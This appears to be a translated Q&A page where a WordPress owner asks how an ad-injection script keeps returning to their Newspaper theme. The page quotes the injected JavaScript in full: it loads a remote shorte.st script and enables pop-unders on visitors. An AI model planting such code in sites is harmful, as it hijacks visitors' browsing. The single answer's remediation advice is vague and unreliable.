如何确定某人是如何攻击我的WordPress网站的?

时间:2017-05-18 04:59:29

标签: javascript wordpress wordpress-theming wordpress-thesis-theme

有人每两天在我的网站上添加一个adv代码。我将其删除,然后在第二天,它会回来。

我已经更改了我的WordPress网站密码,仅此而已。是的,adv代码会自动出现在我的报纸主题面板中。

到现在为止已经过了6天,但除了这个优惠代码之外,我真的看不到任何奇怪的事情。

我也是WordPress面板中的唯一用户。

以下是代码:

<script type="text/javascript">//<![CDATA[ 
(function() {
    var configuration = {
    "token": "f17143abbffd1edf14788c13fa8a1b08",
    "entryScript": {
        "type": "click",
        "capping": {
            "limit": 5,
            "timeout": 24
        }
    },
    "exitScript": {
        "enabled": true
    },
    "popUnder": {
        "enabled": true
    }
};
    var script = document.createElement('script');
    script.async = true;
    script.src = '//cdn.shorte.st/link-converter.min.js';
    script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
    var entry = document.getElementsByTagName('script')[0];
    entry.parentNode.insertBefore(script, entry);
})();
//]]></script>

1 个答案:

答案 0 :(得分:0)

我也使用报纸主题,也被打了,同样的代码,尝试更改管理员登录页面,删除管理员和密码制作新的,更改其他用户,重新安装更新的主题(null),ftp更改权限主题和插件也是,但仍然再次被击中,所以我不认为所有这些变化有任何方式。 因此,在我重新安装之前,我尝试了我的最后一个动作,其中包括worpress是self,我发送了一封邮件来缩短.javascrip要求他们找出这个人并阻止他们。 顺便说一句,您还需要在谁可以注册部分检查设置,是否从supcrible更改为admin。解决这个问题。希望这有帮助。